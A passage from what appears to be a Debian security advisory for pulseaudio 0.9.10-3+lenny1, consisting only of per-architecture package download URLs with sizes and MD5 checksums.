checksum: 103568 73a67ab9becc2b57f1e4ca9c4a5eaf75\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 94954 9dde93f91a8bfe9709658068d71302cc\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 275640 fe39f81ff143794ea37ff8fe723c3cb5\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 69872 7f1dd148fa909dc7949876975040d07d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 62016 eb187cc758afc788910f2a51b0147552\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 657190 14a9f66c21bea2b4dfa316e3bf756f54\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 345480 a1769efb8182c4ce43625e791b586379\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 261368 062e6b1afa28866b228fc87155943732\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 208414 e084a3d799635456d4dbacdca86bd1b7\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 182370 c1e14b5fd691c1641415338cf1e79447\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 78974 d0129cf797a2776b114e3fe1edb27481\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 100854 7262936a66cbfbf28238d9a8aac94df5\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 626258 ad53927f9191a30ece14d384771d91eb\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 64802 5d1e2592b74d0aa62e8632bc1d7332dd\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 329958 cf1dc1d53d63aff332f77000f9689809\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 87944 8b09c160eba8056accc7ac6a76f4b99e\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 66768 d5d2287c15c58ea6711780f292bc33ef\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 98506 f78a97401b61a2509e4cd1706a0184f1\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 78480 c3b249616f8c006be82934af31a0ae3b\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 74446 1c6806ac6a22f536f6c7cea114a0df0d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 97200 86660a9b90cd20673b93e29bf29cb276\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 64646 ed1ff8ed495d3b8b3a22bf7afc065da8\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 345030 64a42b2d34effc11b1e8a61620a7a521\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 61126 3b04087a15e8a03584b59037cd6afa1b\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 68672 c62121286746886bcf0a71602e4cb752\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 77926 2738194ead6bc01c6218f06a12788ffc\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 172832 42b925c62b31a7ce70e20a625b79dff7\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 96862 3c3bdd4e5b1e7e71943bc5a10b3ca556\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 235472 d4807cb2d24fe5c75dc1d383c873853d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 68622 9f569fcb383085837dce53178f475606\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 67704 f23f1863dc92465ab4471a3c14353e5f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 274188 4a63ab9fec354c4e55fe3e3dcb625abd\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 58134 d87db4e90eb34048d1e3a56f23ec11b0\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 327124 6079db2f5393568dccb101b6547e8114\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 92946 216b3faa0e4581d0fd5f0da23c732201\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 187624 a7469faed014c27e22c9e7ddd51839b4\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 75210 0964804e5e0e70a407f141ac94733d68\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 74640 bf161ee39ae869868db5302b7a83c4a5\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 395536 cd71bad939472134716b5a9d9e325242\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 64550 fa163fdf969411758028900ca1bbcb09\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 72450 3b6a9f32d9d244935b7491573a5b938f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 74902 1b76741165db8949eff8fd209cc50a2e\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 247624 12183ccf151d84e69aed0232134b1cfd\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 634794 f150604332530b14c12a2c6fed8dd811\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 487892 202ea396c26028b0a80f6b114652ef02\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 236928 66145897cb2594f7922a858e865b34c3\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 476576 d1fa8daa880ad0d961cca194ffd1f03a\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 83924 84618cf2effb7106dc0dab0535f4543e\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 309532 f24a84b7d79bde93b8f4f3f71d4a4122\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 93012 69fdb275fbef3c08ea27435acd614247\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 267248 51b3045e082e78268f2529891d424601\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 68670 a8cf46bb4c9bf56537d55a1a9ceecb54\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 83410 b890db2bc15ceeafd14a377577d31d35\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 68134 d74e54a886deca2c4359ade661cdb42a\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 380682 c43351c007f56ab3d77a1f977f659c5a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 63556 b374042d43bb6f8fc4efc27b36f9969e\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 96502 04ab1de243a7d36b9895e2876b85a8ac\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 100782 6480a01d3e6a8a2c120a03b921cadff7\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 80850 fa575119328c04d1b54df674ee47ba96\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 59646 ae7539cea6d769bbaf67ce25f03a9a9d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 87716 a23aef27fa273004dd6bf72d3000d044\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 79454 95d7c438ff59b44947b33f2e29b049bf\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 71730 94e926c5578c38a3e59e95260fd05f1a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 89394 5c0eb0d18a58698c826cb6f34cc79819\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 312634 49811d5af820d0c01589704a06a43f70\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 94250 99e1822381d12f8a1e272a53229bda2f\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 67700 2fb2a3264f7467fbf11137b1727ceecf\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 347702 12f059b554dd98730756034e5b7dafb6\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 63996 9ba7f7247959d3e48149f749b747874e\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 74308 5df3a35d2ec9a16c54d35f4a319bd465\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 60638 cd57423232f7c86c4b722e9e3d0e2889\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 63862 c7e66b3abe793ab644d131a1fc42e5c0\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 102752 64803fee04739b5dbeac2fc99e7d2b59\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 405048 5ffcc0b6ba1de9e4c69fa41b778c2cbb\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 65328 efd43b1079210526857e64f51c878c2c\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 225428 98a5f6c1f56cb93bcfee9cf16347160c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 67662 e0813f6cf0cd64c6f2829c1a108f16b8\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 416174 88f43dab9cee294d33f0578ac6f099d2\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 172062 dab30e756c76604d0a74f889e4c10b01\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 57730 dfc7881de991c407a62e79a564dab14c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 75466 dd9d908fdcc7d5acbf7bf7465df774e3\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 79020 ac9fc592cc2257e06756052f9ce14c0d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 276606 f472a9954d213e8184287038c9ab319a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 66904 92f526018fe9f96672a74ab7f6cbdb78\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 100898 a6a2f7d6c39fb93349645277235154be\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 650818 816ba8a2498939eec70f3f9175f5fe6d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 93010 1f6f98f7f5d262f1e9f151cea20ad6fd\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 73848 6640b99b6da5351f0c36fa048c1b339b\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 87808 7733283cddcd38ad69383298d12b7af7\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 334254 c35970a8bca34c74557ca97b9fbea976\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 178734 48c3e2141cb85fc630f098c9aa0b31e5\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 98690 7539ef5197b170adc2c0f4f3095dac39\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 78674 6f0f69a9a5a34345f1250210180d6477\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 377926 0b4d6084d5c7d6a8f4d2a606a80e90d9\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 65362 dc52cb4b9ecbf55cd4b048e09edeaa36\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 203634 d46252e0277a17e23ed1c374e7d0b40e\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 101244 4704ccf4dae60837fa5cd056b19cd915\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 70098 9fb0261e0c0e0056aa88bc7fd0b481b4\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 77306 1dc0b5b94030b7a688bda80eaf133c72\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 65732 3669846ce9a835c61658623028a212da\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 403870 973aa32fa72e821b23fffe46084b5d4a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 686228 bbf54598d5b8f07ba19a3ebb7e87325f\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 251140 47533654191322fac29641b0d19b8698\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 194882 460f8cf77083e917a3096fa65c8552a7\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 339512 47cb0c635f75c5420ebf2e9e803f8b4d\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 98870 a485175a5086242ac0adfb7997d4740d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 87304 8c82e2255583ef17b506d36096611f8f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 92304 32d2a875ac15bbeb006a965b459f4cf1\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 60610 3e025417fd8fcfd9ec9acfc8cdff1ac9\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 77312 8fbbaa0f91f6a2780cd9216084608d59\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 82426 038251aa3bf89f11303c5c123a4cf726\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 70378 ea5725f405ee39e985a61865a27854de\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 283046 14cc07f105861c25b5bf221c86b62d91\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 75070 8fdd7192b94ed7e299cecc9b0f92e1ed\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 102824 b977fb28f919d9911d940a74002ba28a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 98982 385739f4ca999e125bb42d1dac974a72\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 82984 ed99d756b799ba6b07e5276658cc78b0\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 68070 dfbe4aea1b2e9408a5f295ff8f4b6a3a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 73856 56d0b369ea00d29bdfd9bb83c0257f9d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 439454 b31c7cafbfcd4c83dddd48785a7754e9\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 100548 0214fc442482b5c7090ceb79f5c27090\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 78522 8261d3e83421e938dc6890010a9d70e0\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 208544 14fecf1a7fcc580afbdeab1f8b73f324\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 99258 65d1c2cd1f3b0428ea380c50d1bd21ce\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 87860 0a6f5a602dbcf5b0a9aa08276bfde951\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 61986 4dcaf2c6e2ccffa2759e83320f32d835\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 371424 da91f945dea21175c7fef71027ce2da3\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 341270 2e06708dc7a2613538e8d9b77b6fc4f6\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 79084 cbd78997b63ef376ee06e0178d73bc8e\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 190560 caf484ec5151295273f93fcee9b3a4b1\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 67958 cf6178674b57b0401c2cfb5ae72f09ab\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 620812 2d6ce88c0adf540f176a3d5245399b9b\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 65930 7dd7becdeae80cf1026b7a493384f90f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 67810 f995fc059e29a3570e10c2c13b4b0bc9\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 415728 a3581bc853eeb0e0b61fb27a20012045\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 70058 72b7126c044b80e87c66eb8a7ea416bc\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 58546 9f267ca42e705a4c67794170141d04f7\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 265622 91881d612e8901e35b3eaec011f33b96\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 75462 c97b5ed23b8f780b48a8bc98abe5b1f6\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 343574 a1cd00f9270d94b950919db89a30a62c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 273492 79a540bbca1d60f49499c9544206ace6\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 68904 e5eb7d9ab4a2ec85a1122132c3c100aa\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 81674 c7163db17dd230855cf1a46383f34264\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 64466 934307a2947170203947227b354ad18b\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 98328 758922dfd82920ca20186820e19ae512\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 78962 f9ec3beb93a7068118530ed33272d174\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 91544 6673126a6365b553ce05c8eb6b16e745\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 66662 45d9e412cf170071c64289e1a92a6b09\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 63560 8ea5f8d300fad52cf57bc093bc938a8a\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 242524 0c84b827fc920dc16f130f0015145708\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 75078 db616b6a59b36438bcd5afc7347f1e96\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 75304 3f020ccb8aea47c0a27e955b5d86a900\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 74232 b19af2e3e228167a6f2f1cce443ee59a\n 